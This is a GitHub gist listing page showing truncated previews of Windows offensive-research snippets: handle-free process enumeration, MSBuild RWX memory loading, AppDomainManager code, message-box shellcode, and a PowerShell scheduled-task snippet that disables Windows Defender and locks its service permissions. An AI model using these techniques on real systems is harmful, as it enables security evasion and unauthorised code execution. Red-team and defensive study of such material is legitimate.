TheWover
/ SystemProcessInformation.cpp
Last active
November 15, 2024 23:46
Demonstrates use of NtQuerySystemInformation and SystemProcessInformation variants to enumerate processes without opening handles
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Demonstrates use of NtQuerySystemInformation and SystemProcessInformation variants to enumerate processes without opening handles | |
| // Author: TheWover | |
| // | |
| #include <iostream> | |
| #include <string> | |
| #include "ntdefs.h" | |
| bool demoSystemProcessInformation(bool full) | |
| { |
TheWover
/ SystemProcessIdInformation.cpp
Last active
October 21, 2024 07:56
Demonstrates use of NtQuerySystemInformation and SystemProcessIdInformation to get the image name of a process without opening a process handle
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Demonstrates use of NtQuerySystemInformation and SystemProcessIdInformation to get the image name of a process without opening a process handle | |
| // Author: TheWover | |
| // | |
| #include <iostream> | |
| #include <string> | |
| #include "ntdefs.h" | |
| typedef struct SYSTEM_PROCESS_ID_INFORMATION | |
| { |
TheWover
/ gist:9955d2543197089760f72934e98baaf7
Created
September 22, 2022 17:19
MSBuild Property Functions - Load RWX Memory Mapped File
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" > | |
| <Target Name="Hello" > | |
| <!-- Call ANY .NET API --> | |
| <!-- | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause | |
TheWover
/ gist:631ea8b25c6ae4090522eb4d17dc20fc
Created
September 22, 2022 17:19
MSBuild Property Functions - Load RWX Memory Mapped File
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" > | |
| <Target Name="Hello" > | |
| <!-- Call ANY .NET API --> | |
| <!-- | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.EnterpriseServices; | |
| using System.Runtime.InteropServices; | |
| public sealed class MyAppDomainManager : AppDomainManager | |
| { | |
| public override void InitializeNewDomain(AppDomainSetup appDomainInfo) | |
| { |
TheWover
/ process_list_without_handles.cpp
Created
June 2, 2021 21:03
— forked from lpBunny/process_list_without_handles.cpp
List process information including process architecture and username without opening any handles
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * | |
| * List process information on windows without opening any handles, including process architecture and username | |
| * | |
| */ | |
| #include <Windows.h> | |
| #include <stdio.h> | |
| #include <math.h> |
TheWover
/ nukefile.cs
Created
May 18, 2021 19:00
Schedule a file for deletion on reboot. Lets you delete locked files and stuff in System32.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| namespace NukeFile | |
| { | |
| class Program | |
| { | |
| /// | |
| /// Consts defined in WINBASE.H | |
| /// | |
| [Flags] |
TheWover
/ x96shell_msgbox.asm
Created
May 7, 2021 18:17
— forked from aaaddress1/x96shell_msgbox.asm
x96 Windows Shellcode: one payload able to used in both 32-bit & 64-bit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; x96 shellcode (x32+x64) by [email protected] | |
| ; yasm -f bin -o x96shell_msgbox x96shell_msgbox.asm | |
| section .text | |
| bits 32 | |
| _main: | |
| call entry | |
| entry: | |
| mov ax, cs | |
| sub ax, 0x23 | |
| jz retTo32b |
TheWover
/ winfork.c
Created
July 10, 2020 01:02
— forked from juntalis/winfork.c
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * fork.c | |
| * Experimental fork() on Windows. Requires NT 6 subsystem or | |
| * newer. | |
| * | |
| * Copyright (c) 2012 William Pitcock <[email protected]> | |
| * | |
| * Permission to use, copy, modify, and/or distribute this software for any | |
| * purpose with or without fee is hereby granted, provided that the above | |
| * copyright notice and this permission notice appear in all copies. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)' | |
| $a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline | |
| Register-ScheduledTask -TaskName 'TestTask' -Action $a | |
| $svc = New-Object -ComObject 'Schedule.Service' | |
| $svc.Connect() | |
| $user = 'NT SERVICE\TrustedInstaller' | |
| $folder = $svc.GetFolder('\') |
NewerOlder